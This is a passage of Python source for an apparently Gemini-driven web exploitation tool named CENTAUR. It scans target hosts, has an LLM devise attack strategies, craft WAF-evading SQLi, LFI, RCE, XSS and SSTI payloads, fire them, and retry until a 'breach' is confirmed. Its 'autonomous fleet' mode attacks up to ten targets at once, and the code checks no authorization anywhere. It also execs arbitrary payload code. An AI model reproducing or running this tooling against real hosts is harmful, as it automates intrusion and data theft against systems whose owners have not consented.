| async def _measure_baseline(self): |
| try: |
| start = time.time() |
| await self.client.get(self._url("/")) |
| self.p.response_time_baseline = time.time() - start |
| except Exception: |
| self.p.response_time_baseline = 1.0 |
|
|
| async def run(self): |
| await self._detect_protocol() |
| try: |
| resp = await self.client.get(self._url("/")) |
| self.p.is_alive = True |
| srv = resp.headers.get("Server", "") |
| if srv: |
| self.p.server_banner = srv |
| self.p.cookies = dict(resp.cookies) |
| await self._fingerprint_tech(resp) |
| await self._scan_paths() |
| await self._measure_baseline() |
| except Exception: |
| pass |
| finally: |
| await self.client.aclose() |
| return self.p |
|
|
| |
| |
| |
|
|
| class ExploitResult: |
| def __init__(self): |
| self.success = False |
| self.status_code = 0 |
| self.response_time = 0.0 |
| self.response_body = "" |
| self.evidence = [] |
| self.extracted_data = "" |
|
|
|
|
| async def advanced_payload_fire(protocol, host, port, endpoint, payload, |
| baseline=1.0, http_method="GET", |
| inject_in_body=False, content_type=""): |
| """ |
| Fire a payload against a target. |
| Supports GET (query-string or path), POST/PUT (body injection). |
| """ |
| result = ExploitResult() |
|
|
| if inject_in_body: |
| url = f"{protocol}://{host}:{port}{endpoint}" |
| body = payload |
| else: |
| url = f"{protocol}://{host}:{port}{endpoint}{payload}" |
| body = None |
|
|
| extra_headers = {} |
| if content_type: |
| extra_headers["Content-Type"] = content_type |
|
|
| exploit_logger.log("INFO", f"Firing {http_method} payload", { |
| "url": url[:120], |
| "method": http_method, |
| "body_len": len(body) if body else 0, |
| }) |
|
|
| start = time.time() |
| try: |
| async with httpx.AsyncClient( |
| verify=False, timeout=EXPLOIT_TIMEOUT, |
| headers={**HTTP_HEADERS, **extra_headers} |
| ) as client: |
| method_fn = { |
| "GET": client.get, |
| "POST": client.post, |
| "PUT": client.put, |
| "DELETE": client.delete, |
| }.get(http_method.upper(), client.get) |
|
|
| if http_method.upper() in ("POST", "PUT") and body: |
| resp = await method_fn(url, content=body) |
| else: |
| resp = await method_fn(url) |
|
|
| result.response_time = time.time() - start |
| result.status_code = resp.status_code |
| result.response_body = resp.text[:2000] |
|
|
| exploit_logger.log("INFO", "Response received", { |
| "status": resp.status_code, |
| "time": f"{result.response_time:.2f}s", |
| "size": len(resp.text), |
| }) |
|
|
| |
| body_lower = resp.text.lower() |
|
|
| |
| lfi_markers = ["root:x:0:0", "[boot loader]", "[extensions]", "uid=", |
| "gid=", "win.ini", "extension=", "for 16-bit app support", |
| "/bin/bash", "/bin/sh", "nobody:x:"] |
| for marker in lfi_markers: |
| if marker in resp.text: |
| result.success = True |
| result.evidence.append(f"LFI: '{marker}' found") |
| lines = [l for l in resp.text.split('\n') if l.strip()][:15] |
| result.extracted_data = '\n'.join(lines) |
|
|
| |
| if (result.response_time > (baseline + 4.0) and |
| any(x in payload.upper() for x in ["SLEEP", "WAITFOR", "PG_SLEEP", "DBMS_PIPE"])): |
| result.success = True |
| result.evidence.append(f"Time-Based SQLi: {result.response_time:.2f}s delay") |
|
|
| |
| sql_errors = ["sql syntax", "mysql", "postgresql", "sqlite", "oracle", |
| "mssql", "syntax error at", "quoted string not properly terminated", |
| "unclosed quotation", "division by zero", "invalid column"] |
| for err in sql_errors: |
| if err in body_lower: |
| result.success = True |
| result.evidence.append(f"SQL Error: '{err}'") |
|
|
| |
| rce_markers = ["uid=", "gid=", "groups=", "Linux version", "Windows NT", |
| "Microsoft Windows", "drwx", "total ", "/bin/bash", |
| "root@", "#", "SYSTEM", "nt authority"] |
| for marker in rce_markers: |
| if marker in resp.text: |
| result.success = True |
| result.evidence.append(f"RCE: '{marker}' found") |
| result.extracted_data = resp.text[:800] |
|
|
| |
| if "<?xml" in resp.text and ("root:" in resp.text or "<!DOCTYPE" in resp.text): |
| result.success = True |
| result.evidence.append("XXE: XML data leaked") |
|
|
| |
| if payload in resp.text and ("<script" in payload.lower() or "onerror" in payload.lower()): |
| result.success = True |
| result.evidence.append("XSS: Payload reflected") |
|
|
| |
| ssti_results = {"{{7*7}}": "49", "${7*7}": "49", "#{7*7}": "49"} |
| for probe, expected in ssti_results.items(): |
| if probe in payload and expected in resp.text: |
| result.success = True |
| result.evidence.append(f"SSTI: Expression evaluated to {expected}") |
|
|
| |
| info_leaks = ["database error", "stack trace", "exception", |
| "debug mode", "warning:", "notice:", "fatal error", |
| "traceback", "at line"] |
| for leak in info_leaks: |
| if leak in body_lower: |
| result.evidence.append(f"Info Leak: '{leak}'") |
|
|
| except asyncio.TimeoutError: |
| result.response_time = EXPLOIT_TIMEOUT |
| if any(x in payload.upper() for x in ["SLEEP", "WAITFOR", "PG_SLEEP"]): |
| result.success = True |
| result.evidence.append("Time-Based SQLi: Timeout (likely success)") |
| except Exception as e: |
| result.evidence.append(f"Error: {str(e)[:100]}") |
| exploit_logger.log("ERROR", f"Execution error: {str(e)[:100]}") |
|
|
| return result |
|
|
| |
| |
| |
|
|
| def execute_code_template(code: str) -> str: |
| """Execute a payload code template and return the printed output.""" |
| import io, contextlib |
| out = io.StringIO() |
| local_ns = {} |
| try: |
| with contextlib.redirect_stdout(out): |
| exec(compile(code, "<payload_code>", "exec"), {}, local_ns) |
| printed = out.getvalue().strip() |
| if printed: |
| return printed.split("\n")[0] |
| if "payload" in local_ns: |
| return str(local_ns["payload"]) |
| except Exception as e: |
| return f"# Code error: {e}" |
| return "" |
|
|
| |
| |
| |
|
|
| async def ai_analyze_target(profile: ReconProfile, api_key: str) -> Optional[VulnerabilityAnalysis]: |
| """Analyze target using Gemini 2.5 with Google Search grounding""" |
| if not api_key: |
| return None |
| |
| llm = genai.Client(api_key=api_key) |
| |
| |
| search_hints = [] |
| if profile.cms_detected: |
| search_hints.append(f"{profile.cms_detected} known CVEs") |
| for tech in profile.technologies[:3]: |
| search_hints.append(f"{tech} vulnerabilities") |
| |
| context = f""" |
| Analyze this web application target for vulnerabilities: |
| |
| TARGET: {profile.target_id} |
| SERVER: {profile.server_banner} |
| WAF: {profile.waf_detected} |
| CMS: {profile.cms_detected} |
| TECHNOLOGIES: {', '.join(profile.technologies)} |
| INJECTABLE PARAMS: {profile.injectable_params[:10]} |
| |
| DISCOVERED PATHS: {profile.discovered_paths[:10]} |
| API ENDPOINTS: {profile.api_endpoints[:10]} |
| FORMS FOUND: {profile.forms_found[:5]} |
| ERROR SIGNATURES: {profile.error_signatures[:5]} |
| |
| SEARCH FOR: Known CVEs and exploits related to: {', '.join(search_hints[:5])} |
| |
| Provide a detailed vulnerability assessment focusing on the most exploitable attack vectors. |
| Include any known CVEs that apply to the detected technologies. |
| Include secondary vulnerabilities to chain. |
| """ |
| try: |
| |
| grounding_tool = types.Tool(google_search=types.GoogleSearch()) |
| |
| config = types.GenerateContentConfig( |
| tools=[grounding_tool], |
| response_mime_type="application/json", |
| response_json_schema=VulnerabilityAnalysis.model_json_schema() |
| ) |
| resp = await llm.aio.models.generate_content( |
| model="gemini-2.5-flash", |
| contents=context, |
| config=config |
| ) |
| return VulnerabilityAnalysis.model_validate_json(resp.text) |
| except Exception as e: |
| exploit_logger.log("ERROR", f"AI Analysis error: {e}") |
| return None |
|
|
|
|
| async def ai_generate_strategy(profile: ReconProfile, analysis: VulnerabilityAnalysis, |
| api_key: str) -> Optional[AttackStrategy]: |
| """Generate attack strategy with Metasploit template matching""" |
| llm = genai.Client(api_key=api_key) |
| |
| |
| matching_template = None |
| for template_id, template in METASPLOIT_TEMPLATES.items(): |
| if profile.cms_detected and profile.cms_detected.lower() in template["name"].lower(): |
| matching_template = template_id |
| break |
| for cve in analysis.related_cves: |
| if cve in template.get("cve", ""): |
| matching_template = template_id |
| break |
| |
| context = f""" |
| Based on this vulnerability analysis, create a detailed attack strategy: |
| |
| ANALYSIS: |
| {analysis.model_dump_json(indent=2)} |
| |
| TARGET CONTEXT: |
| - Server: {profile.server_banner} |
| - WAF: {profile.waf_detected} |
| - CMS: {profile.cms_detected} |
| - Technologies: {', '.join(profile.technologies)} |
| - Available endpoints: {profile.api_endpoints[:5]} |
| - Forms: {profile.forms_found[:5]} |
| - Injectable params: {profile.injectable_params[:10]} |
| |
| METASPLOIT TEMPLATES AVAILABLE: |
| {json.dumps(METASPLOIT_TEMPLATES, indent=2)} |
| |
| {"RECOMMENDED TEMPLATE: " + matching_template if matching_template else ""} |
| |
| Specify whether to use GET or POST. For SQLi/LFI/XSS in form fields use POST. |
| If a Metasploit template applies, specify it in the metasploit_template field. |
| Generate a comprehensive attack strategy including WAF evasion techniques. |
| """ |
| try: |
| grounding_tool = types.Tool(google_search=types.GoogleSearch()) |
| config = types.GenerateContentConfig( |
| tools=[grounding_tool], |
| response_mime_type="application/json", |
| response_json_schema=AttackStrategy.model_json_schema() |
| ) |
| resp = await llm.aio.models.generate_content( |
| model="gemini-2.5-flash", |
| contents=context, |
| config=config |
| ) |
| return AttackStrategy.model_validate_json(resp.text) |
| except Exception as e: |
| exploit_logger.log("ERROR", f"Strategy generation error: {e}") |
| return None |
|
|
|
|
| async def ai_craft_payload(strategy: AttackStrategy, profile: ReconProfile, |
| api_key: str) -> Optional[PayloadGeneration]: |
| """Craft payload with Metasploit template support""" |
| llm = genai.Client(api_key=api_key) |
|
|
| vuln_class = strategy.vulnerability_class |
| library_payloads = [] |
| for vtype, categories in PAYLOAD_LIBRARY.items(): |
| if vtype.lower() in vuln_class.lower() or vuln_class.lower() in vtype.lower(): |
| for cat_payloads in categories.values(): |
| library_payloads.extend(cat_payloads[:3]) |
|
|
| |
| metasploit_context = "" |
| if strategy.metasploit_template and strategy.metasploit_template in METASPLOIT_TEMPLATES: |
| template = METASPLOIT_TEMPLATES[strategy.metasploit_template] |
| metasploit_context = f""" |
| METASPLOIT TEMPLATE TO USE: |
| {json.dumps(template, indent=2)} |
| |
| Use this template as the basis for your payload. Adapt it for the target endpoint. |
| """ |
|
|
| template_hint = "Custom" |
| if "SQLi" in vuln_class or "SQL" in vuln_class: |
| template_hint = "SQLi_TimeBased" if "time" in strategy.strategy.lower() else "SQLi_Union" |
| elif "LFI" in vuln_class: |
| template_hint = "LFI_Basic" |
| elif "RCE" in vuln_class or "Command" in vuln_class: |
| template_hint = "RCE_CommandInjection" |
| elif "XSS" in vuln_class: |
| template_hint = "XSS_Basic" |
| elif "SSTI" in vuln_class: |
| template_hint = "SSTI_Detection" |
|
|
| context = f""" |
| Craft an advanced exploitation payload with Python code: |
| |
| STRATEGY: |
| {strategy.model_dump_json(indent=2)} |
| |
| WAF DETECTED: {profile.waf_detected} |
| SERVER: {profile.server_banner} |
| |
| {metasploit_context} |
| |
| REFERENCE PAYLOADS (use as inspiration, modify for evasion): |
| {json.dumps(library_payloads[:12], indent=2)} |
| |
| PYTHON CODE TEMPLATE BASE (extend/modify this): |
| ```python |
| {PAYLOAD_CODE_TEMPLATES.get(template_hint, PAYLOAD_CODE_TEMPLATES["Custom"])} |
| ``` |
| |
| REQUIREMENTS: |
| 1. Generate the exact payload string ready to fire |
| 2. Provide Python code that generates this payload as a callable function |
| 3. Apply WAF evasion from the strategy |
| 4. Set inject_in_body=True and provide content_type if the attack needs POST body injection |
| 5. Provide 4+ alternative payloads ranked by likelihood of success |
| 6. If using a Metasploit template, adapt it for this specific target |
| """ |
| try: |
| grounding_tool = types.Tool(google_search=types.GoogleSearch()) |
| config = types.GenerateContentConfig( |
| tools=[grounding_tool], |
| response_mime_type="application/json", |
| response_json_schema=PayloadGeneration.model_json_schema() |
| ) |
| resp = await llm.aio.models.generate_content( |
| model="gemini-2.5-flash", |
| contents=context, |
| config=config |
| ) |
| pg = PayloadGeneration.model_validate_json(resp.text) |
| exploit_logger.log("INFO", "AI generated payload", { |
| "payload": pg.payload[:80], |
| "encoding": pg.encoding, |
| "method": pg.http_method, |
| }) |
| return pg |
| except Exception as e: |
| exploit_logger.log("ERROR", f"Payload generation error: {e}") |
| return None |
|
|
|
|
| async def ai_analyze_exploit_result(result: ExploitResult, payload: str, |
| api_key: str) -> Optional[ExploitAnalysis]: |
| """Analyze exploit results and provide fix suggestions""" |
| llm = genai.Client(api_key=api_key) |
| context = f""" |
| Analyze this exploitation attempt: |
| |
| PAYLOAD USED: {payload} |
| |
| RESULTS: |
| - Status Code: {result.status_code} |
| - Response Time: {result.response_time}s |
| - Evidence Found: {result.evidence} |
| |
| RESPONSE SNIPPET: |
| {result.response_body[:800]} |
| |
| EXTRACTED DATA: |
| {result.extracted_data[:400]} |
| |
| Determine if the exploit succeeded, what was confirmed, and recommend next escalation steps. |
| If the exploit failed, provide specific suggestions to fix/improve the payload. |
| """ |
| try: |
| config = types.GenerateContentConfig( |
| response_mime_type="application/json", |
| response_json_schema=ExploitAnalysis.model_json_schema() |
| ) |
| resp = await llm.aio.models.generate_content( |
| model="gemini-2.5-flash", |
| contents=context, |
| config=config |
| ) |
| return ExploitAnalysis.model_validate_json(resp.text) |
| except Exception as e: |
| exploit_logger.log("ERROR", f"Exploit analysis error: {e}") |
| return None |
|
|
| |
| |
| |
|
|
| async def ai_patch_payload_code(current_code: str, user_request: str, |
| context: dict, api_key: str) -> Optional[PayloadPatchResponse]: |
| llm = genai.Client(api_key=api_key) |
| prompt = f""" |
| You are a penetration testing expert. Patch the following Python payload generation code. |
| |
| CURRENT CODE: |
| ```python |
| {current_code} |
| ``` |
| |
| CONTEXT: |
| - Target: {context.get('target', 'Unknown')} |
| - Server: {context.get('server', 'Unknown')} |
| - WAF: {context.get('waf', 'None')} |
| - Last Result: {context.get('last_result', 'N/A')} |
| |
| USER REQUEST: {user_request} |
| |
| INSTRUCTIONS: |
| 1. Modify the code to address the user's request |
| 2. Keep it as executable Python code with functions |
| 3. Add comments explaining changes |
| 4. Ensure the code prints the primary payload as the first line of stdout |
| |
| Provide patched code and explain what changed. |
| """ |
| try: |
| config = types.GenerateContentConfig( |
| response_mime_type="application/json", |
| response_json_schema=PayloadPatchResponse.model_json_schema() |
| ) |
| resp = await llm.aio.models.generate_content( |
| model="gemini-2.5-flash", |
| contents=prompt, |
| config=config |
| ) |
| patch = PayloadPatchResponse.model_validate_json(resp.text) |
| exploit_logger.log("INFO", "AI patched code", {"changes": len(patch.changes_made)}) |
| return patch |
| except Exception as e: |
| exploit_logger.log("ERROR", f"Code patching failed: {e}") |
| return None |
|
|
| |
| |
| |
|
|
| async def fix_loop_execute(profile: ReconProfile, strategy: AttackStrategy, |
| initial_payload: PayloadGeneration, api_key: str, |
| max_iterations: int = MAX_FIX_ITERATIONS): |
| """ |
| Execute payload with fix loop: try -> analyze -> fix -> retry |
| """ |
| exploit_logger.log("INFO", f"Starting fix loop with max {max_iterations} iterations") |
| |
| current_payload = initial_payload |
| iteration_results = [] |
| |
| for iteration in range(max_iterations): |
| exploit_logger.log("INFO", f"Fix loop iteration {iteration + 1}/{max_iterations}") |
| |
| |
| result = await advanced_payload_fire( |
| profile.protocol, profile.host, profile.port, |
| strategy.target_endpoint, |
| current_payload.payload, |
| profile.response_time_baseline, |
| http_method=current_payload.http_method, |
| inject_in_body=current_payload.inject_in_body, |
| content_type=current_payload.content_type, |
| ) |
| |
| |
| analysis = await ai_analyze_exploit_result(result, current_payload.payload, api_key) |
| |
| iteration_results.append({ |
| "iteration": iteration + 1, |
| "payload": current_payload.payload[:100], |
| "success": result.success, |
| "evidence": result.evidence, |
| "analysis": analysis.model_dump() if analysis else None |
| }) |
| |
| |
| if result.success: |
| exploit_logger.log("INFO", f"Fix loop succeeded on iteration {iteration + 1}") |
| return result, iteration_results |
| |
| |
| if analysis and analysis.fix_suggestions and iteration < max_iterations - 1: |
| exploit_logger.log("INFO", f"Attempting to fix payload based on suggestions") |
| |
| |
| fix_context = f""" |
| Previous payload failed. Apply these fixes: |
| {', '.join(analysis.fix_suggestions)} |
| |
| Original strategy: |
| {strategy.model_dump_json(indent=2)} |
| |
| Last result: |
| - Status: {result.status_code} |
| - Evidence: {result.evidence} |
| - Response: {result.response_body[:200]} |
| |
| Generate an improved payload that addresses the failure. |
| """ |
| |
| try: |
| llm = genai.Client(api_key=api_key) |
| config = types.GenerateContentConfig( |
| response_mime_type="application/json", |
| response_json_schema=PayloadGeneration.model_json_schema() |
| ) |
| resp = await llm.aio.models.generate_content( |
| model="gemini-2.5-flash", |
| contents=fix_context, |
| config=config |
| ) |
| current_payload = PayloadGeneration.model_validate_json(resp.text) |
| exploit_logger.log("INFO", f"Generated new payload: {current_payload.payload[:80]}") |
| except Exception as e: |
| exploit_logger.log("ERROR", f"Failed to generate fix: {e}") |
| break |
| else: |
| |
| break |
| |
| exploit_logger.log("INFO", f"Fix loop completed after {len(iteration_results)} iterations") |
| return result, iteration_results |
|
|
| |
| |
| |
|
|
| async def centaur_chat_agent(user_msg, chat_history, target_id, state, |
| current_ep, current_pl, current_code, http_method, api_key): |
| """Centaur chat agent with Gradio 6 compatibility""" |
| chat_history = chat_history or [] |
| if not api_key or not target_id: |
| chat_history.append({"role": "user", "content": user_msg}) |
| chat_history.append({"role": "assistant", "content": "🔴 Missing API Key or Target Selection."}) |
| return chat_history, current_ep, current_pl, current_code, http_method, state |
|
|
| llm = genai.Client(api_key=api_key) |
| p = state["profiles"][target_id] |
| recent_arsenal = state["arsenal"][target_id][-5:] if target_id in state["arsenal"] else [] |
|
|
| context = f""" |
| You are CENTAUR, an elite Red Team AI assistant specialising in web application security. |
| |
| TARGET INTELLIGENCE: |
| - ID: {target_id} |
| - Server: {p.server_banner} |
| - WAF: {p.waf_detected} |
| - CMS: {p.cms_detected} |
| - Technologies: {', '.join(p.technologies)} |
| - Discovered Paths: {p.discovered_paths[:10]} |
| - API Endpoints: {p.api_endpoints[:10]} |
| - Forms: {p.forms_found[:5]} |
| - Injectable Params: {p.injectable_params[:10]} |
| - Error Signatures: {p.error_signatures[:5]} |
| - Response Baseline: {p.response_time_baseline:.2f}s |
| |
| CURRENT STATE: |
| HTTP Method: {http_method} |
| Endpoint: {current_ep} |
| Payload: {current_pl} |
| |
| CURRENT CODE: |
| ```python |
| {current_code} |
| ``` |
| |
| RECENT ATTEMPTS: |
| {json.dumps(recent_arsenal, indent=2)} |
| |
| OPERATOR REQUEST: {user_msg} |
| |
| INSTRUCTIONS: |
| 1. Analyse the request using all available intelligence |
| 2. Update endpoint, payload, code, and HTTP method as needed |
| 3. Provide expert technical guidance with specific references to recon data |
| 4. Explain evasion techniques clearly |
| 5. Return http_method as GET or POST based on the best attack approach |
| """ |
| try: |
| config = types.GenerateContentConfig( |
| response_mime_type="application/json", |
| response_json_schema=CentaurChatResponse.model_json_schema() |
| ) |
| resp = await llm.aio.models.generate_content( |
| model="gemini-2.5-flash", |
| contents=context, |
| config=config |
| ) |
| data = CentaurChatResponse.model_validate_json(resp.text) |
|
|
| formatted_reply = f"**{data.chat_reply}**\n\n📋 Technical Analysis:\n{data.technical_analysis}" |
| |
| chat_history.append({"role": "user", "content": user_msg}) |
| chat_history.append({"role": "assistant", "content": formatted_reply}) |
|
|
| state["arsenal"][target_id].append({ |
| "Timestamp": datetime.now().strftime("%H:%M:%S"), |
| "Method": data.http_method, |
| "Endpoint": data.suggested_endpoint, |
| "Payload": data.suggested_payload, |
| "Status": "🤖 AI Generated", |
| "Notes": f"From: {user_msg[:50]}...", |
| }) |
|
|
| return (chat_history, data.suggested_endpoint, data.suggested_payload, |
| data.suggested_code, data.http_method, state) |
| except Exception as e: |
| exploit_logger.log("ERROR", f"Chat agent failed: {e}") |
| chat_history.append({"role": "user", "content": user_msg}) |
| chat_history.append({"role": "assistant", "content": f"⚠️ Agent Error: {str(e)}"}) |
| return chat_history, current_ep, current_pl, current_code, http_method, state |
|
|
| |
| |
| |
|
|
| async def run_autonomous_fleet(selected, api_key, state): |
| """Run autonomous fleet with fix loop integration""" |
| if not api_key or not selected: |
| return "🔴 Deployment Error: Select targets and provide API Key.", "", [] |
|
|
| detailed_logs = [] |
|
|
| async def attack_sequence(tid): |
| p = state["profiles"][tid] |
| log = [f"🎯 Target: {tid}", |
| f"📡 Recon: {len(p.discovered_paths)} paths, {len(p.api_endpoints)} APIs"] |
| try: |
| log.append("🧠 Phase 1: AI Vulnerability Analysis (with Google Search)...") |
| analysis = await ai_analyze_target(p, api_key) |
| if not analysis: |
| return {"Target": tid, "Phase": "Analysis", "Status": "❌ Failed", "Details": "AI analysis failed"} |
|
|
| log.append(f" └─ {analysis.vulnerability_type} ({analysis.confidence})") |
| log.append(f" └─ {analysis.reasoning[:100]}...") |
| if analysis.related_cves: |
| log.append(f" └─ CVEs: {', '.join(analysis.related_cves[:3])}") |
|
|
| log.append("🎮 Phase 2: Attack Strategy Generation...") |
| strategy = await ai_generate_strategy(p, analysis, api_key) |
| if not strategy: |
| return {"Target": tid, "Phase": "Strategy", "Status": "❌ Failed", "Details": "Strategy failed"} |
|
|
| log.append(f" └─ Attack: {strategy.vulnerability_class} via {strategy.http_method}") |
| log.append(f" └─ Endpoint: {strategy.target_endpoint}") |
| log.append(f" └─ Evasion: {', '.join(strategy.evasion_techniques[:3])}") |
| if strategy.metasploit_template: |
| log.append(f" └─ Metasploit: {strategy.metasploit_template}") |
|
|
| log.append("⚔️ Phase 3: Payload Generation...") |
| payload_gen = await ai_craft_payload(strategy, p, api_key) |
| if not payload_gen: |
| return {"Target": tid, "Phase": "Payload", "Status": "❌ Failed", "Details": "Payload gen failed"} |
|
|
| log.append(f" └─ Payload: {payload_gen.payload[:80]}...") |
| log.append(f" └─ Encoding: {payload_gen.encoding}") |
|
|
| log.append("🔄 Phase 4: Fix Loop Execution (up to 3 attempts)...") |
| final_result, iterations = await fix_loop_execute(p, strategy, payload_gen, api_key) |
| |
| for iter_data in iterations: |
| log.append(f" └─ Attempt {iter_data['iteration']}: {iter_data['success'] and '✅ Success' or '❌ Failed'}") |
| log.append(f" Evidence: {', '.join(iter_data['evidence'][:2])}") |
|
|
| if final_result.success: |
| log.append("🎊 Phase 5: Breach Confirmed!") |
| log.append(f" └─ Confirmed: {analysis.vulnerability_type}") |
| log.append(f" └─ Evidence: {', '.join(final_result.evidence[:3])}") |
| state["arsenal"][tid].append({ |
| "Timestamp": datetime.now().strftime("%H:%M:%S"), |
| "Method": payload_gen.http_method, |
| "Endpoint": strategy.target_endpoint, |
| "Payload": payload_gen.payload, |
| "Code": payload_gen.code_template, |
| "Status": "✅ BREACH CONFIRMED", |
| "Notes": f"{analysis.vulnerability_type} | {', '.join(final_result.evidence[:2])} | {len(iterations)} attempts", |
| }) |
|
|
| detailed_logs.append("\n".join(log)) |
| return { |
| "Target": tid, |
| "Vulnerability":analysis.vulnerability_type, |
| "Confidence": analysis.confidence, |
| "Method": payload_gen.http_method, |
| "Payload": payload_gen.payload[:60] + "...", |
| "Status": "✅ BREACH" if final_result.success else "🔒 Blocked", |
| "Evidence": ", ".join(final_result.evidence[:2]) if final_result.evidence else "None", |
| "HTTP": final_result.status_code, |
| "Attempts": len(iterations), |
| } |
| except Exception as e: |
| exploit_logger.log("ERROR", f"Autonomous failed on {tid}: {e}") |
| detailed_logs.append("\n".join(log) + f"\n❌ Error: {str(e)}") |
| return {"Target": tid, "Vulnerability": "Error", "Confidence": "N/A", |
| "Method": "N/A", "Payload": "N/A", "Status": "❌ Failed", |
| "Evidence": str(e)[:50], "HTTP": 0, "Attempts": 0} |
|
|
| results = await asyncio.gather(*[attack_sequence(t) for t in selected[:10]]) |
| df = pd.DataFrame(results) |
| success_count = len(df[df['Status'] == '✅ BREACH']) |
| total = len(df) |
|
|
| summary = f"""## 🚀 Autonomous Fleet Report |
| **Breaches:** {success_count}/{total} | **Success Rate:** {(success_count/total*100):.1f}% |
| **Attack Distribution:** {df['Vulnerability'].value_counts().to_dict()} |
| **Fix Loop Stats:** Avg attempts: {df['Attempts'].mean():.1f}""" |
|
|
| html_table = df.to_html(classes='table', index=False, escape=False) |
| return summary, html_table, detailed_logs |
|
|
| |
| |
| |
|
|
| def get_payload_library_df(): |
| rows = [] |
| for vuln_type, categories in PAYLOAD_LIBRARY.items(): |
| for category, payloads in categories.items(): |
| for payload in payloads: |
| rows.append({"Type": vuln_type, "Category": category, "Payload": payload}) |
| return pd.DataFrame(rows) |
|
|
|
|
| def filter_payloads(vuln_type_filter, search_term): |
| df = get_payload_library_df() |
| if vuln_type_filter and vuln_type_filter != "All": |
| df = df[df["Type"] == vuln_type_filter] |
| if search_term: |
| df = df[df["Payload"].str.contains(search_term, case=False, na=False)] |
| return df |
|
|
|
|
| def get_db_dataframe(state, ip_filter="", port_filter="", vuln_only=False): |
| profs = list(state.get("profiles", {}).values()) |
| if not profs: |
| return pd.DataFrame(columns=["target_id","protocol","server","waf","cms", |
| "paths","errors","forms","apis","tech","Status"]) |
| df = pd.DataFrame([p.to_dict() for p in profs]) |
| df["Status"] = df.apply( |
| lambda row: "✅ Exploitable" if (row["paths"] > 0 or row["errors"] > 0) else "⚪ Limited", axis=1 |
| ) |
| if ip_filter: |
| df = df[df["target_id"].str.contains(ip_filter, case=False, na=False)] |
| if port_filter: |
| df = df[df["target_id"].str.endswith(f":{port_filter}")] |
| if vuln_only: |
| df = df[df["Status"] == "✅ Exploitable"] |
| return df |
|
|
|
|
| async def run_recon_bg(files, manual, state): |
| targets = [] |
|
|
| if files: |
| for f in files: |
| try: |
| with open(f.name, 'r') as csvf: |
| for row in csv.reader(csvf): |
| if row: |
| host = row[0].strip() |
| port = int(row[1]) if len(row) > 1 and row[1].strip().isdigit() else 80 |
| targets.append((host, port)) |
| except Exception: |
| pass |
|
|
| if manual: |
| for line in manual.strip().split('\n'): |
| line = line.strip().replace(' ', '') |
| if not line or line.startswith('#'): |
| continue |
| if ':' in line: |
| parts = line.split(':') |
| host = parts[0] |
| port = int(parts[1]) if parts[1].isdigit() else 80 |
| else: |
| host = line |
| port = 80 |
| targets.append((host, port)) |
|
|
| if not targets: |
| yield state, gr.update(choices=[]), gr.update(choices=[]), "❌ No targets provided", pd.DataFrame() |
| return |
|
|
| exploit_logger.clear() |
| exploit_logger.log("INFO", f"Starting reconnaissance on {len(targets)} targets") |
|
|
| state["profiles"] = {} |
| state["arsenal"] = defaultdict(list) |
|
|
| sem = asyncio.Semaphore(MAX_CONCURRENT_RECON) |
|
|
| async def scan_task(h, p): |
| async with sem: |
| return await AdvancedReconEngine(ReconProfile(h, p)).run() |
|
|
| tasks = [asyncio.create_task(scan_task(h, p)) for h, p in list(set(targets))] |
| total = len(tasks) |
|
|
| for i, coro in enumerate(asyncio.as_completed(tasks), 1): |
| p = await coro |
| state["profiles"][p.target_id] = p |
| exploitable = [k for k, v in state["profiles"].items() if v.is_exploitable] |
| df = get_db_dataframe(state) |
| progress = f"🔍 Scanning: {i}/{total} | Exploitable: {len(exploitable)}" |
| yield state, gr.update(choices=exploitable), gr.update(choices=exploitable), progress, df |
|
|
| final_exploitable = [k for k, v in state["profiles"].items() if v.is_exploitable] |
| final_df = get_db_dataframe(state) |
| final_msg = f"✅ Recon Complete! Scanned {total}. Found {len(final_exploitable)} exploitable." |
| exploit_logger.log("INFO", final_msg) |
| yield state, gr.update(choices=final_exploitable), gr.update(choices=final_exploitable), final_msg, final_df |
|
|
|
|
| def on_target_select(tid, state): |
| if not tid or tid not in state["profiles"]: |
| return ("Select a target from the dropdown...", |
| pd.DataFrame(columns=["Timestamp","Method","Endpoint","Payload","Status","Notes"]), |
| PAYLOAD_CODE_TEMPLATES["Custom"]) |
|
|
| p = state["profiles"][tid] |
| context = f"""## 🎯 Target Profile: `{tid}` |
| |
| **Infrastructure:** |
| - Protocol: `{p.protocol.upper()}` | Server: `{p.server_banner}` | WAF: `{p.waf_detected}` | CMS: `{p.cms_detected}` |
| - Technologies: `{', '.join(p.technologies) if p.technologies else 'Unknown'}` |
| |
| **Attack Surface:** |
| - Paths: `{len(p.discovered_paths)}` → {', '.join(p.discovered_paths[:5])} |
| - APIs: `{len(p.api_endpoints)}` → {', '.join(p.api_endpoints[:5])} |
| - Forms: `{len(p.forms_found)}` | Errors: `{len(p.error_signatures)}` |
| - Injectable Params: `{', '.join(p.injectable_params[:8])}` |
| |
| **Timing Baseline:** `{p.response_time_baseline:.3f}s` |
| |
| **Error Intelligence:** |
| {chr(10).join(['- ' + sig for sig in p.error_signatures[:5]]) or '- None'} |
| """ |
| arsenal_data = state["arsenal"].get(tid, []) |
| df = pd.DataFrame(arsenal_data) if arsenal_data else pd.DataFrame( |
| columns=["Timestamp","Method","Endpoint","Payload","Status","Notes"]) |
| return context, df, PAYLOAD_CODE_TEMPLATES["Custom"] |
|
|
|
|
| async def execute_manual_wrap(tid, ep, pl, code, http_method, use_code, state): |
| if not tid or tid not in state["profiles"]: |
| return "❌ Select a valid target first.", state, pd.DataFrame(), exploit_logger.format_logs() |
|
|
| p = state["profiles"][tid] |
|
|
| actual_payload = pl |
| if use_code and code.strip(): |
| derived = execute_code_template(code) |
| if derived and not derived.startswith("# Code error"): |
| actual_payload = derived |
| exploit_logger.log("INFO", f"Using code-derived payload: {actual_payload[:80]}") |
|
|
| exploit_logger.log("INFO", "Manual execution", { |
| "target": tid, "method": http_method, |
| "endpoint": ep, "payload_len": len(actual_payload) |
| }) |
|
|
| result = await advanced_payload_fire( |
| p.protocol, p.host, p.port, ep, actual_payload, |
| p.response_time_baseline, http_method=http_method |
| ) |
|
|
| status_icon = "✅ SUCCESS" if result.success else "🔒 Blocked" |
| evidence_str = " | ".join(result.evidence[:3]) if result.evidence else "No evidence" |
|
|
| result_md = f"""### Execution Result |
| **Status:** {status_icon} | **HTTP:** {result.status_code} | **Time:** {result.response_time:.2f}s |
| **Evidence:** {evidence_str} |
| |
| **Response Snippet:** |
| ``` |
| {result.response_body[:500]} |
| ``` |
| **Extracted Data:** |
| ``` |
| {result.extracted_data[:400] if result.extracted_data else 'None'} |
| ```""" |
|
|
| state["arsenal"][tid].append({ |
| "Timestamp": datetime.now().strftime("%H:%M:%S"), |
